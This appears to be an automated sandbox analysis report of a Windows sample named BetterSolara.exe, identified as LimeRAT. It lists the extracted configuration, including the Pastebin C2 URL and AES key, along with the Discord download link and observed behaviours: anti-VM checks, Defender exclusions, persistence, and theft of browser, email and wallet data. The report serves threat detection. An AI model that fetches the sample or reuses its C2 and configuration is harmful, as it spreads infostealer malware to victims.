Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
29-05-2024 21:40
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://cdn.discordapp.com/attachments/1245482251467362385/1245491763477610506/BetterSolara.exe?ex=6658f218&is=6657a098&hm=6d4a1d7d00451c014a500cb11aa96a187ef87e27e44a2d7e34eb3e57704912ab&
Resource
win10v2004-20240508-en
General
Malware Config
Extracted
limerat
-
aes_key
0790308
-
antivm
true
-
c2_url
https://pastebin.com/raw/J0uqtmU4
-
delay
3
-
download_payload
false
-
install
true
-
install_name
Wservices.exe
-
main_folder
AppData
-
pin_spread
false
-
sub_folder
\
-
usb_spread
false
Extracted
limerat
-
antivm
false
-
c2_url
https://pastebin.com/raw/J0uqtmU4
-
download_payload
false
-
install
false
-
pin_spread
false
-
usb_spread
false
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cd57e4c171d6e8f5ea8b8f824a6a7316.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2016 powershell.exe 5552 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts cd57e4c271d6e8f5ea8b8f824a6a7316.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cd57e4c171d6e8f5ea8b8f824a6a7316.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cd57e4c171d6e8f5ea8b8f824a6a7316.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation BetterSolara.exe Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation cd57e4c172d6e8f5ea8b8f824a6a7316.exe -
Executes dropped EXE 5 IoCs
pid Process 5688 BetterSolara.exe 5984 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 6012 cd57e4c172d6e8f5ea8b8f824a6a7316.exe 6060 cd57e4c271d6e8f5ea8b8f824a6a7316.exe 5608 Wservices.exe -
Loads dropped DLL 5 IoCs
pid Process 5984 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 5984 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 5984 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 5984 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 5984 cd57e4c171d6e8f5ea8b8f824a6a7316.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x00070000000238f9-1851.dat themida behavioral1/memory/5984-1860-0x0000000180000000-0x0000000180C32000-memory.dmp themida behavioral1/memory/5984-1901-0x0000000180000000-0x0000000180C32000-memory.dmp themida behavioral1/memory/5984-1905-0x0000000180000000-0x0000000180C32000-memory.dmp themida behavioral1/memory/5984-1906-0x0000000180000000-0x0000000180C32000-memory.dmp themida behavioral1/memory/5984-1907-0x0000000180000000-0x0000000180C32000-memory.dmp themida behavioral1/memory/5984-1931-0x0000000180000000-0x0000000180C32000-memory.dmp themida behavioral1/memory/5984-1955-0x0000000180000000-0x0000000180C32000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe" cd57e4c271d6e8f5ea8b8f824a6a7316.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cd57e4c171d6e8f5ea8b8f824a6a7316.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 77 pastebin.com 82 raw.githubusercontent.com 83 raw.githubusercontent.com 52 discord.com 54 discord.com 76 pastebin.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 45 api.ipify.org 46 api.ipify.org 48 ip-api.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum cd57e4c271d6e8f5ea8b8f824a6a7316.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 cd57e4c271d6e8f5ea8b8f824a6a7316.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 5984 cd57e4c171d6e8f5ea8b8f824a6a7316.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5900 schtasks.exe -
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2624 wmic.exe 5928 wmic.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 49 Go-http-client/1.1 -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 cd57e4c271d6e8f5ea8b8f824a6a7316.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 cd57e4c271d6e8f5ea8b8f824a6a7316.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f53000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c7f000000010000000c000000300a06082b060105050703097e000000010000000800000000c001b39667d601030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 cd57e4c271d6e8f5ea8b8f824a6a7316.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C cd57e4c271d6e8f5ea8b8f824a6a7316.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 cd57e4c271d6e8f5ea8b8f824a6a7316.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 cd57e4c271d6e8f5ea8b8f824a6a7316.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 cd57e4c271d6e8f5ea8b8f824a6a7316.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 cd57e4c271d6e8f5ea8b8f824a6a7316.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 5c00000001000000040000000008000019000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae4747e000000010000000800000000c001b39667d6017f000000010000000c000000300a06082b060105050703091d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb0b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b0601050507030853000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 cd57e4c271d6e8f5ea8b8f824a6a7316.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 509167.crdownload:SmartScreen msedge.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 696 vlc.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1896 msedge.exe 1896 msedge.exe 4928 msedge.exe 4928 msedge.exe 4328 identity_helper.exe 4328 identity_helper.exe 5592 msedge.exe 5592 msedge.exe 6060 cd57e4c271d6e8f5ea8b8f824a6a7316.exe 6060 cd57e4c271d6e8f5ea8b8f824a6a7316.exe 6060 cd57e4c271d6e8f5ea8b8f824a6a7316.exe 6060 cd57e4c271d6e8f5ea8b8f824a6a7316.exe 6060 cd57e4c271d6e8f5ea8b8f824a6a7316.exe 6060 cd57e4c271d6e8f5ea8b8f824a6a7316.exe 2016 powershell.exe 2016 powershell.exe 2016 powershell.exe 5912 powershell.exe 5912 powershell.exe 5912 powershell.exe 5552 powershell.exe 5552 powershell.exe 5552 powershell.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5608 Wservices.exe 5504 msedge.exe 5504 msedge.exe 5504 msedge.exe 5504 msedge.exe 5608 Wservices.exe -
